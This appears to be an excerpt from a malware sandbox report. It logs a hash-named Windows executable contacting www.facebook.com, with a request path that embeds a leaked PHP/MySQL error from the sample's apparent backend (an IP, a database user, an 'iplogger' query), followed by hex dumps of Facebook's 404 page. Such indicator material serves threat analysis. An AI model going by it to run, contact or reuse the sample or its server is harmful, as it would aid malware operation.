9	192.168.2.5	49720	185.60.216.35	443	C:\Users\user\Desktop\38b2c7a1af454d382927f81543d86055886bc02863457.exe

Timestamp	kBytes transferred	Direction	Data
2022-10-07 14:00:15 UTC	1162	OUT	GET /%3Cbr%20/%3E%0A%3Cb%3EDeprecated%3C/b%3E:%20%20mysql_pconnect():%20The%20mysql%20extension%20is%20deprecated%20and%20will%20be%20removed%20in%20the%20future:%20use%20mysqli%20or%20PDO%20instead%20in%20%3Cb%3E/www/wwwroot/103.136.42.153/seemorebty/includes/database.php%3C/b%3E%20on%20line%20%3Cb%3E47%3C/b%3E%0A%3Cbr%20/%3E%0A%3Cbr%20/%3E%0A%3Cb%3EWarning%3C/b%3E:%20%20mysql_pconnect():%20Access%20denied%20for%20user%20'dbnew01'@'localhost'%20(using%20password:%20YES)%20in%20%3Cb%3E/www/wwwroot/103.136.42.153/seemorebty/includes/database.php%3C/b%3E%20on%20line%20%3Cb%3E47%3C/b%3E%0A%3Cbr%20/%3E%0A%3Cbr%20/%3E%0A%3Cb%3EWarning%3C/b%3E:%20%20mysql_query()%20expects%20parameter%202%20to%20be%20resource,%20boolean%20given%20in%20%3Cb%3E/www/wwwroot/103.136.42.153/seemorebty/includes/database.php%3C/b%3E%20on%20line%20%3Cb%3E73%3C/b%3E%0A%3Cbr%20/%3E%0A%3Cfont%20color=%22%23000000%22%3E%0A%3Cb%3E1045%20-%20Access%20denied%20for%20user%20'dbnew01'@'localhost'%20(using%20password:%20YES)%3Cbr%3E%0A%3Cbr%3Eselect%20iplogger%20from%20t_channels%20where%20name='38b2c7a1af454d382927f81543d86055886bc02863457'%20limit%200,1%3Cbr%3E%0A%3Cbr%3E%0A%3Csmall%3E%0A%3Cfont%20color=%22%23ff0000%22%3E%5BTEP%20STOP%5D%3C/font%3E%0A%3C/small%3E%0A%3Cbr%3E%0A%3Cbr%3E%0A%3C/b%3E%0A%3C/font%3E HTTP/1.1 Connection: Keep-Alive Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image webp,image apng, q=0.8,application signed-exchange v=b3 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit 537.36 (KHTML, like Gecko) Chrome 70.0.3538.110 Safari 537.36 Host: www.facebook.com
2022-10-07 14:00:15 UTC	1164	IN	HTTP/1.1 404 Not Found Vary: Accept-Encoding report-to: {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown"}]} x-fb-rlafr: 0 document-policy: force-load-at-top cross-origin-resource-policy: same-origin cross-origin-opener-policy: same-origin-allow-popups Pragma: no-cache Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT X-Content-Type-Options: nosniff X-XSS-Protection: 0 X-Frame-Options: DENY Strict-Transport-Security: max-age=15552000; preload Content-Type: text/html; charset="utf-8" X-FB-Debug: SPy7pi4V1GReK60/XyYXQAY/EYU2d9HatMiDOcUWAlBu9i9ErTn3gS48Vf6gXwIxhO5ez+dOFHsqZLYPSdaNOQ== Date: Fri, 07 Oct 2022 14:00:15 GMT Priority: u=3,i Transfer-Encoding: chunked Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Connection: close
2022-10-07 14:00:15 UTC	1165	IN	Data Raw: 31 38 36 64 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 69 64 3d 22 66 61 63 65 62 6f 6f 6b 22 20 63 6c 61 73 73 3d 22 6e 6f 5f 6a 73 22 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 64 65 66 61 75 6c 74 22 20 69 64 3d 22 6d 65 74 61 5f 72 65 66 65 72 72 65 72 22 20 2f 3e 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 5a 77 71 30 45 79 76 6a 22 3e 66 75 6e 63 74 69 6f 6e 20 65 6e 76 46 6c 75 73 68 28 61 29 7b 66 75 6e 63 74 69 6f 6e 20 62 28 62 29 7b 66 6f 72 28 76 61 72 20 63 20 69 6e 20 61 29 62 5b 63 5d 3d 61 5b 63 5d 7d 77 69 6e 64 6f 77 2e 72 65 71 75 Data Ascii: 186db<!DOCTYPE html><html lang="en" id="facebook" class="no_js"><head><meta charset="utf-8" /><meta name="referrer" content="default" id="meta_referrer" /><script nonce="Zwq0Eyvj">function envFlush(a){function b(b){for(var c in a)b[c]=a[c]}window.requ
2022-10-07 14:00:15 UTC	1165	IN	Data Raw: 28 66 75 6e 63 74 69 6f 6e 28 61 29 7b 66 75 6e 63 74 69 6f 6e 20 62 28 62 29 7b 69 66 28 21 77 69 6e 64 6f 77 2e 6f 70 65 6e 44 61 74 61 62 61 73 65 29 72 65 74 75 72 6e 3b 62 2e 49 5f 41 4d 5f 49 4e 43 4f 47 4e 49 54 4f 5f 41 4e 44 5f 49 5f 52 45 41 4c 4c 59 5f 4e 45 45 44 5f 57 45 42 53 51 4c 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 29 7b 72 65 74 75 72 6e 20 77 69 6e 64 6f 77 2e 6f 70 65 6e 44 61 74 61 62 61 73 65 28 61 2c 62 2c 63 2c 64 29 7d 3b 77 69 6e 64 6f 77 2e 6f 70 65 6e 44 61 74 61 62 61 73 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 29 7d 7d 62 28 61 29 7d 29 28 74 68 69 73 29 3b 3c 2f 73 63 72 69 70 74 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 5a 77 71 30 45 79 76 6a 22 3e 3c 2f 73 74 Data Ascii: (function(a){function b(b){if(!window.openDatabase)return;b.I_AM_INCOGNITO_AND_I_REALLY_NEED_WEBSQL=function(a,b,c,d){return window.openDatabase(a,b,c,d)};window.openDatabase=function(){throw new Error()}}b(a)})(this);</script><style nonce="Zwq0Eyvj"></st
2022-10-07 14:00:15 UTC	1167	IN	Data Raw: 38 62 32 63 37 61 31 61 66 34 35 34 64 33 38 32 39 32 37 66 38 31 35 34 33 64 38 36 30 35 35 38 38 36 62 63 30 32 38 36 33 34 35 37 26 23 30 33 39 3b 25 32 30 6c 69 6d 69 74 25 32 30 30 2c 31 25 33 43 62 72 25 33 45 25 30 41 25 33 43 62 72 25 33 45 25 30 41 25 33 43 73 6d 61 6c 6c 25 33 45 25 30 41 25 33 43 66 6f 6e 74 25 32 30 63 6f 6c 6f 72 3d 25 32 32 25 32 33 66 66 30 30 30 30 25 32 32 25 33 45 25 35 42 54 45 50 25 32 30 53 54 4f 50 25 35 44 25 33 43 2f 66 6f 6e 74 25 33 45 25 30 41 25 33 43 2f 73 6d 61 6c 6c 25 33 45 25 30 41 25 33 43 62 72 25 33 45 25 30 41 25 33 43 62 72 25 33 45 25 30 41 25 33 43 2f 62 25 33 45 25 30 41 25 33 43 2f 66 6f 6e 74 25 33 45 3f 5f 66 62 5f 6e 6f 73 63 72 69 70 74 3d 31 22 20 2f 3e 3c 2f 6e 6f 73 63 72 69 70 74 3e 3c 6c Data Ascii: 8b2c7a1af454d382927f81543d86055886bc02863457'%20limit%200,1%3Cbr%3E%0A%3Cbr%3E%0A%3Csmall%3E%0A%3Cfont%20color=%22%23ff0000%22%3E%5BTEP%20STOP%5D%3C/font%3E%0A%3C/small%3E%0A%3Cbr%3E%0A%3Cbr%3E%0A%3C/b%3E%0A%3C/font%3E?_fb_noscript=1" /></noscript><l
2022-10-07 14:00:15 UTC	1168	IN	Data Raw: 32 25 32 33 30 30 30 30 30 30 25 32 32 25 33 45 25 30 41 25 33 43 62 25 33 45 31 30 34 35 25 32 30 2d 25 32 30 41 63 63 65 73 73 25 32 30 64 65 6e 69 65 64 25 32 30 66 6f 72 25 32 30 75 73 65 72 25 32 30 26 23 30 33 39 3b 64 62 6e 65 77 30 31 26 23 30 33 39 3b 26 23 30 36 34 3b 26 23 30 33 39 3b 6c 6f 63 61 6c 68 6f 73 74 26 23 30 33 39 3b 25 32 30 28 75 73 69 6e 67 25 32 30 70 61 73 73 77 6f 72 64 3a 25 32 30 59 45 53 29 25 33 43 62 72 25 33 45 25 30 41 25 33 43 62 72 25 33 45 73 65 6c 65 63 74 25 32 30 69 70 6c 6f 67 67 65 72 25 32 30 66 72 6f 6d 25 32 30 74 5f 63 68 61 6e 6e 65 6c 73 25 32 30 77 68 65 72 65 25 32 30 6e 61 6d 65 3d 26 23 30 33 39 3b 33 38 62 32 63 37 61 31 61 66 34 35 34 64 33 38 32 39 32 37 66 38 31 35 34 33 64 38 36 30 35 35 38 38 36 Data Ascii: 2%23000000%22%3E%0A%3Cb%3E1045%20-%20Access%20denied%20for%20user%20'dbnew01'@'localhost'%20(using%20password:%20YES)%3Cbr%3E%0A%3Cbr%3Eselect%20iplogger%20from%20t_channels%20where%20name='38b2c7a1af454d382927f81543d86055886
2022-10-07 14:00:15 UTC	1170	IN	Data Raw: 31 26 23 30 33 39 3b 26 23 30 36 34 3b 26 23 30 33 39 3b 6c 6f 63 61 6c 68 6f 73 74 26 23 30 33 39 3b 25 32 30 28 75 73 69 6e 67 25 32 30 70 61 73 73 77 6f 72 64 3a 25 32 30 59 45 53 29 25 33 43 62 72 25 33 45 25 30 41 25 33 43 62 72 25 33 45 73 65 6c 65 63 74 25 32 30 69 70 6c 6f 67 67 65 72 25 32 30 66 72 6f 6d 25 32 30 74 5f 63 68 61 6e 6e 65 6c 73 25 32 30 77 68 65 72 65 25 32 30 6e 61 6d 65 3d 26 23 30 33 39 3b 33 38 62 32 63 37 61 31 61 66 34 35 34 64 33 38 32 39 32 37 66 38 31 35 34 33 64 38 36 30 35 35 38 38 36 62 63 30 32 38 36 33 34 35 37 26 23 30 33 39 3b 25 32 30 6c 69 6d 69 74 25 32 30 30 2c 31 25 33 43 62 72 25 33 45 25 30 41 25 33 43 62 72 25 33 45 25 30 41 25 33 43 73 6d 61 6c 6c 25 33 45 25 30 41 25 33 43 66 6f 6e 74 25 32 30 63 6f 6c 6f Data Ascii: 1'@'localhost'%20(using%20password:%20YES)%3Cbr%3E%0A%3Cbr%3Eselect%20iplogger%20from%20t_channels%20where%20name='38b2c7a1af454d382927f81543d86055886bc02863457'%20limit%200,1%3Cbr%3E%0A%3Cbr%3E%0A%3Csmall%3E%0A%3Cfont%20colo
2022-10-07 14:00:15 UTC	1171	IN	Data Raw: 2e 63 73 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 20 64 61 74 61 2d 62 6f 6f 74 6c 6f 61 64 65 72 2d 68 61 73 68 3d 22 6f 42 2f 79 58 67 33 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 2f 72 73 72 63 2e 70 68 70 2f 76 33 2f 79 6f 2f 6c 2f 30 2c 63 72 6f 73 73 2f 58 48 77 75 41 5f 5f 34 32 41 66 2e 63 73 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 20 64 61 74 61 2d 62 6f 6f 74 6c 6f 61 64 65 72 2d 68 61 73 68 3d 22 34 42 47 54 6d 43 37 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 Data Ascii: .css?_nc_x=Ij3Wp8lg5Kz" data-bootloader-hash="oB/yXg3" /><link type="text/css" rel="stylesheet" href="https://static.xx.fbcdn.net/rsrc.php/v3/yo/l/0,cross/XHwuA__42Af.css?_nc_x=Ij3Wp8lg5Kz" data-bootloader-hash="4BGTmC7" /><link type="text/css" rel="sty
2022-10-07 14:00:15 UTC	1173	IN	Data Raw: 54 34 5f 5a 51 69 30 73 54 6a 53 74 2d 52 78 73 53 30 22 7d 2c 22 38 31 32 36 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 34 55 37 71 47 30 36 70 39 73 46 36 75 38 41 34 59 22 7d 2c 22 36 37 36 38 33 38 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 36 6e 4e 31 65 68 54 39 79 71 2d 32 71 36 43 71 34 22 7d 2c 22 31 32 31 37 31 35 37 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 36 42 37 59 6d 6c 6c 4f 73 41 72 6e 4b 36 78 54 73 22 7d 2c 22 31 35 35 34 38 32 37 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 37 7a 75 65 47 4c 68 47 6f 30 63 54 35 78 69 72 73 22 7d 2c 22 31 37 33 38 34 38 36 22 3a 7b 22 72 65 Data Ascii: T4_ZQi0sTjSt-RxsS0"},"8126":{"result":false,"hash":"AT4U7qG06p9sF6u8A4Y"},"676838":{"result":false,"hash":"AT6nN1ehT9yq-2q6Cq4"},"1217157":{"result":false,"hash":"AT6B7YmllOsArnK6xTs"},"1554827":{"result":false,"hash":"AT7zueGLhGo0cT5xirs"},"1738486":{"re
2022-10-07 14:00:15 UTC	1174	IN	Data Raw: 30 30 2c 22 73 22 3a 22 4c 61 78 22 7d 2c 22 77 64 22 3a 7b 22 74 22 3a 36 30 34 38 30 30 2c 22 73 22 3a 22 4c 61 78 22 7d 2c 22 78 2d 72 65 66 65 72 65 72 22 3a 7b 22 73 22 3a 22 4e 6f 6e 65 22 7d 2c 22 78 2d 73 72 63 22 3a 7b 22 74 22 3a 31 2c 22 73 22 3a 22 4e 6f 6e 65 22 7d 7d 2c 32 31 30 34 5d 2c 5b 22 43 75 72 72 65 6e 74 43 6f 6d 6d 75 6e 69 74 79 49 6e 69 74 69 61 6c 44 61 74 61 22 2c 5b 5d 2c 7b 7d 2c 34 39 30 5d 2c 5b 22 43 75 72 72 65 6e 74 45 6e 76 69 72 6f 6e 6d 65 6e 74 22 2c 5b 5d 2c 7b 22 66 61 63 65 62 6f 6f 6b 64 6f 74 63 6f 6d 22 3a 74 72 75 65 2c 22 6d 65 73 73 65 6e 67 65 72 64 6f 74 63 6f 6d 22 3a 66 61 6c 73 65 2c 22 77 6f 72 6b 70 6c 61 63 65 64 6f 74 63 6f 6d 22 3a 66 61 6c 73 65 2c 22 69 6e 73 74 61 67 72 61 6d 64 6f 74 63 6f 6d Data Ascii: 00,"s":"Lax"},"wd":{"t":604800,"s":"Lax"},"x-referer":{"s":"None"},"x-src":{"t":1,"s":"None"}},2104],["CurrentCommunityInitialData",[],{},490],["CurrentEnvironment",[],{"facebookdotcom":true,"messengerdotcom":false,"workplacedotcom":false,"instagramdotcom
2022-10-07 14:00:15 UTC	1176	IN	Data Raw: 76 65 72 73 69 6f 6e 22 3a 32 2c 22 73 68 6f 75 6c 64 5f 72 61 6e 64 6f 6d 69 7a 65 22 3a 66 61 6c 73 65 7d 2c 32 31 31 31 5d 2c 5b 22 55 73 65 72 41 67 65 6e 74 44 61 74 61 22 2c 5b 5d 2c 7b 22 62 72 6f 77 73 65 72 41 72 63 68 69 74 65 63 74 75 72 65 22 3a 22 36 34 22 2c 22 62 72 6f 77 73 65 72 46 75 6c 6c 56 65 72 73 69 6f 6e 22 3a 6e 75 6c 6c 2c 22 62 72 6f 77 73 65 72 4d 69 6e 6f 72 56 65 72 73 69 6f 6e 22 3a 6e 75 6c 6c 2c 22 62 72 6f 77 73 65 72 4e 61 6d 65 22 3a 22 55 6e 6b 6e 6f 77 6e 22 2c 22 62 72 6f 77 73 65 72 56 65 72 73 69 6f 6e 22 3a 6e 75 6c 6c 2c 22 64 65 76 69 63 65 4e 61 6d 65 22 3a 22 55 6e 6b 6e 6f 77 6e 22 2c 22 65 6e 67 69 6e 65 4e 61 6d 65 22 3a 22 55 6e 6b 6e 6f 77 6e 22 2c 22 65 6e 67 69 6e 65 56 65 72 73 69 6f 6e 22 3a 6e 75 6c Data Ascii: version":2,"should_randomize":false},2111],["UserAgentData",[],{"browserArchitecture":"64","browserFullVersion":null,"browserMinorVersion":null,"browserName":"Unknown","browserVersion":null,"deviceName":"Unknown","engineName":"Unknown","engineVersion":nul
2022-10-07 14:00:15 UTC	1177	IN	Data Raw: 22 53 52 54 5f 42 41 4e 5a 41 49 5f 53 52 54 5f 43 4f 52 45 5f 4c 4f 47 47 45 52 22 2c 22 53 52 54 5f 42 41 4e 5a 41 49 5f 53 52 54 5f 4d 41 49 4e 5f 4c 4f 47 47 45 52 22 2c 22 57 4f 52 4b 50 4c 41 43 45 5f 50 4c 41 54 46 4f 52 4d 5f 53 45 43 55 52 45 5f 41 50 50 53 5f 4d 41 49 4c 42 4f 58 45 53 22 2c 22 50 4f 43 4b 45 54 5f 4d 4f 4e 53 54 45 52 53 5f 55 50 44 41 54 45 5f 4e 41 4d 45 22 2c 22 49 43 5f 44 49 53 41 42 4c 45 5f 4d 45 52 47 45 5f 54 4f 4f 4c 5f 46 45 45 44 5f 43 48 45 43 4b 5f 46 4f 52 5f 52 45 50 4c 41 43 45 5f 53 43 48 45 44 55 4c 45 22 2c 22 41 44 53 5f 45 50 44 5f 49 4d 50 41 43 54 45 44 5f 41 44 56 45 52 54 49 53 45 52 5f 4d 49 47 52 41 54 45 5f 58 43 4f 4e 54 52 4f 4c 4c 45 52 22 2c 22 52 45 43 52 55 49 54 49 4e 47 5f 43 41 4e 44 49 44 Data Ascii: "SRT_BANZAI_SRT_CORE_LOGGER","SRT_BANZAI_SRT_MAIN_LOGGER","WORKPLACE_PLATFORM_SECURE_APPS_MAILBOXES","POCKET_MONSTERS_UPDATE_NAME","IC_DISABLE_MERGE_TOOL_FEED_CHECK_FOR_REPLACE_SCHEDULE","ADS_EPD_IMPACTED_ADVERTISER_MIGRATE_XCONTROLLER","RECRUITING_CANDID
2022-10-07 14:00:15 UTC	1179	IN	Data Raw: 74 2e 73 6b 79 2e 63 6f 6d 22 2c 22 67 72 61 70 68 69 74 65 2e 69 6e 73 74 61 67 72 61 6d 2e 63 6f 6d 22 2c 22 77 77 77 2e 6b 66 63 2e 63 6f 2e 74 68 22 2c 22 6c 65 61 72 6e 2e 70 61 6e 74 68 65 6f 6e 2e 69 6f 22 2c 22 77 77 77 2e 6c 61 6e 64 6d 61 72 6b 73 68 6f 70 73 2e 69 6e 22 2c 22 77 77 77 2e 6e 63 6c 2e 63 6f 6d 22 2c 22 73 30 2e 77 70 2e 63 6f 6d 22 2c 22 77 77 77 2e 74 61 74 61 63 6c 69 71 2e 63 6f 6d 22 2c 22 62 73 2e 73 65 72 76 69 6e 67 2d 73 79 73 2e 63 6f 6d 22 2c 22 6b 6f 68 6c 73 2e 63 6f 6d 22 2c 22 6c 61 7a 61 64 61 2e 63 6f 2e 74 68 22 2c 22 78 67 34 6b 65 6e 2e 63 6f 6d 22 2c 22 74 65 63 68 6e 6f 70 61 72 6b 2e 72 75 22 2c 22 6f 66 66 69 63 65 64 65 70 6f 74 2e 63 6f 6d 2e 6d 78 22 2c 22 62 65 73 74 62 75 79 2e 63 6f 6d 2e 6d 78 22 2c Data Ascii: t.sky.com","graphite.instagram.com","www.kfc.co.th","learn.pantheon.io","www.landmarkshops.in","www.ncl.com","s0.wp.com","www.tatacliq.com","bs.serving-sys.com","kohls.com","lazada.co.th","xg4ken.com","technopark.ru","officedepot.com.mx","bestbuy.com.mx",
2022-10-07 14:00:15 UTC	1180	IN	Data Raw: 5e 29 22 2c 22 5c 2f 5f 45 5c 2f 22 3a 22 28 5b 2e 2c 21 3f 5c 5c 73 5d 7c 24 29 22 7d 2c 22 70 61 74 74 65 72 6e 73 22 3a 7b 22 5c 2f 5c 75 30 30 30 31 28 2e 2a 29 28 27 7c 26 23 30 33 39 3b 29 73 5c 75 30 30 30 31 28 3f 3a 27 7c 26 23 30 33 39 3b 29 73 28 2e 2a 29 5c 2f 22 3a 22 5c 75 30 30 30 31 24 31 24 32 73 5c 75 30 30 30 31 24 33 22 2c 22 5c 2f 5f 5c 75 30 30 30 31 28 5b 5e 5c 75 30 30 30 31 5d 2a 29 5c 75 30 30 30 31 5c 2f 22 3a 22 6a 61 76 61 73 63 72 69 70 74 22 7d 7d 2c 31 34 39 36 5d 2c 5b 22 49 6e 74 6c 56 69 65 77 65 72 43 6f 6e 74 65 78 74 22 2c 5b 5d 2c 7b 22 47 45 4e 44 45 52 22 3a 33 2c 22 72 65 67 69 6f 6e 61 6c 4c 6f 63 61 6c 65 22 3a 6e 75 6c 6c 7d 2c 37 37 32 5d 2c 5b 22 4e 75 6d 62 65 72 46 6f 72 6d 61 74 43 6f 6e 66 69 67 22 2c 5b Data Ascii: ^)","\/_E\/":"([.,!?\\s]\|$)"},"patterns":{"\/\u0001(.)('\|')s\u0001(?:'\|')s(.)\/":"\u0001$1$2s\u0001$3","\/_\u0001([^\u0001]*)\u0001\/":"javascript"}},1496],["IntlViewerContext",[],{"GENDER":3,"regionalLocale":null},772],["NumberFormatConfig",[
2022-10-07 14:00:15 UTC	1182	IN	Data Raw: 6b 5c 2f 22 3a 31 2c 22 5c 2f 65 78 69 74 64 73 69 74 65 22 3a 31 2c 22 5c 2f 7a 65 72 6f 5c 2f 62 61 6c 61 6e 63 65 5c 2f 70 69 78 65 6c 5c 2f 22 3a 31 2c 22 5c 2f 7a 65 72 6f 5c 2f 62 61 6c 61 6e 63 65 5c 2f 22 3a 31 2c 22 5c 2f 7a 65 72 6f 5c 2f 62 61 6c 61 6e 63 65 5c 2f 63 61 72 72 69 65 72 5f 6c 61 6e 64 69 6e 67 5c 2f 22 3a 31 2c 22 5c 2f 7a 65 72 6f 5c 2f 66 6c 65 78 5c 2f 6c 6f 67 67 69 6e 67 5c 2f 22 3a 31 2c 22 5c 2f 74 72 22 3a 31 2c 22 5c 2f 74 72 5c 2f 22 3a 31 2c 22 5c 2f 73 65 6d 5f 63 61 6d 70 61 69 67 6e 73 5c 2f 73 65 6d 5f 70 69 78 65 6c 5f 74 65 73 74 5c 2f 22 3a 31 2c 22 5c 2f 62 6f 6f 6b 6d 61 72 6b 73 5c 2f 66 6c 79 6f 75 74 5c 2f 62 6f 64 79 5c 2f 22 3a 31 2c 22 5c 2f 7a 65 72 6f 5c 2f 73 75 62 6e 6f 5c 2f 22 3a 31 2c 22 5c 2f 63 Data Ascii: k\/":1,"\/exitdsite":1,"\/zero\/balance\/pixel\/":1,"\/zero\/balance\/":1,"\/zero\/balance\/carrier_landing\/":1,"\/zero\/flex\/logging\/":1,"\/tr":1,"\/tr\/":1,"\/sem_campaigns\/sem_pixel_test\/":1,"\/bookmarks\/flyout\/body\/":1,"\/zero\/subno\/":1,"\/c
2022-10-07 14:00:15 UTC	1183	IN	Data Raw: 6e 5c 2f 62 75 79 5c 2f 22 3a 31 2c 22 5c 2f 75 70 73 65 6c 6c 5c 2f 73 6d 73 5c 2f 22 3a 31 2c 22 5c 2f 77 61 70 5c 2f 61 5c 2f 63 68 61 6e 6e 65 6c 5c 2f 72 65 63 6f 6e 6e 65 63 74 2e 70 68 70 22 3a 31 2c 22 5c 2f 77 61 70 5c 2f 61 5c 2f 6e 75 78 5c 2f 77 69 7a 61 72 64 5c 2f 6e 61 76 2e 70 68 70 22 3a 31 2c 22 5c 2f 77 61 70 5c 2f 61 70 70 72 65 67 2e 70 68 70 22 3a 31 2c 22 5c 2f 77 61 70 5c 2f 62 69 72 74 68 64 61 79 5f 68 65 6c 70 2e 70 68 70 22 3a 31 2c 22 5c 2f 77 61 70 5c 2f 63 2e 70 68 70 22 3a 31 2c 22 5c 2f 77 61 70 5c 2f 63 6f 6e 66 69 72 6d 65 6d 61 69 6c 2e 70 68 70 22 3a 31 2c 22 5c 2f 77 61 70 5c 2f 63 72 2e 70 68 70 22 3a 31 2c 22 5c 2f 77 61 70 5c 2f 6c 6f 67 69 6e 2e 70 68 70 22 3a 31 2c 22 5c 2f 77 61 70 5c 2f 72 2e 70 68 70 22 3a 31 Data Ascii: n\/buy\/":1,"\/upsell\/sms\/":1,"\/wap\/a\/channel\/reconnect.php":1,"\/wap\/a\/nux\/wizard\/nav.php":1,"\/wap\/appreg.php":1,"\/wap\/birthday_help.php":1,"\/wap\/c.php":1,"\/wap\/confirmemail.php":1,"\/wap\/cr.php":1,"\/wap\/login.php":1,"\/wap\/r.php":1
2022-10-07 14:00:15 UTC	1184	IN	Data Raw: 22 2c 22 61 70 70 5f 69 64 22 3a 22 32 35 36 32 38 31 30 34 30 35 35 38 22 2c 22 65 6e 61 62 6c 65 5f 62 6c 61 64 65 72 75 6e 6e 65 72 22 3a 66 61 6c 73 65 2c 22 65 6e 61 62 6c 65 5f 61 63 6b 22 3a 74 72 75 65 2c 22 70 75 73 68 5f 70 68 61 73 65 22 3a 22 43 33 22 2c 22 65 6e 61 62 6c 65 5f 6f 62 73 65 72 76 65 72 22 3a 66 61 6c 73 65 2c 22 65 6e 61 62 6c 65 5f 64 61 74 61 6c 6f 73 73 5f 74 69 6d 65 72 22 3a 66 61 6c 73 65 2c 22 65 6e 61 62 6c 65 5f 66 61 6c 6c 62 61 63 6b 5f 66 6f 72 5f 62 72 22 3a 74 72 75 65 2c 22 66 69 78 5f 62 72 5f 69 6e 69 74 5f 72 63 22 3a 66 61 6c 73 65 2c 22 71 75 65 75 65 5f 61 63 74 69 76 61 74 69 6f 6e 5f 65 78 70 65 72 69 6d 65 6e 74 22 3a 66 61 6c 73 65 2c 22 6d 61 78 5f 64 65 6c 61 79 5f 62 72 5f 71 75 65 75 65 22 3a 36 30 Data Ascii: ","app_id":"256281040558","enable_bladerunner":false,"enable_ack":true,"push_phase":"C3","enable_observer":false,"enable_dataloss_timer":false,"enable_fallback_for_br":true,"fix_br_init_rc":false,"queue_activation_experiment":false,"max_delay_br_queue":60
2022-10-07 14:00:15 UTC	1186	IN	Data Raw: 22 63 6c 65 61 72 49 6e 74 65 72 76 61 6c 42 6c 75 65 22 2c 22 41 61 33 69 46 55 61 73 36 6b 39 68 35 38 64 4a 6e 43 5a 59 39 44 7a 31 5f 53 62 30 46 4f 55 4d 6e 49 4d 38 6c 66 2d 6d 51 42 72 67 56 6b 4d 46 70 79 44 6a 53 31 42 4c 49 69 58 4a 49 4f 41 6b 72 6d 41 38 59 43 79 6f 4d 62 4e 51 6c 61 45 56 77 32 68 68 47 6f 2d 56 64 62 67 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 31 31 38 33 35 37 39 22 2c 5b 22 49 6e 6c 69 6e 65 46 62 74 52 65 73 75 6c 74 49 6d 70 6c 22 5d 2c 7b 22 5f 5f 72 63 22 3a 5b 22 49 6e 6c 69 6e 65 46 62 74 52 65 73 75 6c 74 49 6d 70 6c 22 2c 22 41 61 33 69 46 55 61 73 36 6b 39 68 35 38 64 4a 6e 43 5a 59 39 44 7a 31 5f 53 62 30 46 4f 55 4d 6e 49 4d 38 6c 66 2d 6d 51 42 72 67 56 6b 4d 46 70 79 44 6a 53 31 42 4c 49 69 58 4a 49 4f 41 6b 72 Data Ascii: "clearIntervalBlue","Aa3iFUas6k9h58dJnCZY9Dz1_Sb0FOUMnIM8lf-mQBrgVkMFpyDjS1BLIiXJIOAkrmA8YCyoMbNQlaEVw2hhGo-Vdbg"]},-1],["cr:1183579",["InlineFbtResultImpl"],{"__rc":["InlineFbtResultImpl","Aa3iFUas6k9h58dJnCZY9Dz1_Sb0FOUMnIM8lf-mQBrgVkMFpyDjS1BLIiXJIOAkr
2022-10-07 14:00:15 UTC	1187	IN	Data Raw: 6f 6e 66 69 67 22 2c 5b 5d 2c 7b 7d 2c 32 33 39 33 5d 2c 5b 22 49 6e 74 6c 43 75 72 72 65 6e 74 4c 6f 63 61 6c 65 22 2c 5b 5d 2c 7b 22 63 6f 64 65 22 3a 22 65 6e 5f 55 53 22 7d 2c 35 39 35 34 5d 2c 5b 22 55 53 49 44 4d 65 74 61 64 61 74 61 22 2c 5b 5d 2c 7b 22 62 72 6f 77 73 65 72 5f 69 64 22 3a 22 3f 22 2c 22 74 61 62 5f 69 64 22 3a 22 22 2c 22 70 61 67 65 5f 69 64 22 3a 22 50 72 6a 64 79 77 66 37 6c 32 33 74 36 22 2c 22 74 72 61 6e 73 69 74 69 6f 6e 5f 69 64 22 3a 30 2c 22 76 65 72 73 69 6f 6e 22 3a 36 7d 2c 35 38 38 38 5d 2c 5b 22 63 72 3a 36 38 36 22 2c 5b 5d 2c 7b 22 5f 5f 72 63 22 3a 5b 6e 75 6c 6c 2c 22 41 61 32 57 67 76 43 33 30 64 30 4f 6b 76 52 54 33 76 4e 52 69 49 5f 68 59 79 71 59 56 48 57 65 72 51 69 39 79 50 30 4d 38 65 33 72 68 39 53 63 5f Data Ascii: onfig",[],{},2393],["IntlCurrentLocale",[],{"code":"en_US"},5954],["USIDMetadata",[],{"browser_id":"?","tab_id":"","page_id":"Prjdywf7l23t6","transition_id":0,"version":6},5888],["cr:686",[],{"__rc":[null,"Aa2WgvC30d0OkvRT3vNRiI_hYyqYVHWerQi9yP0M8e3rh9Sc_
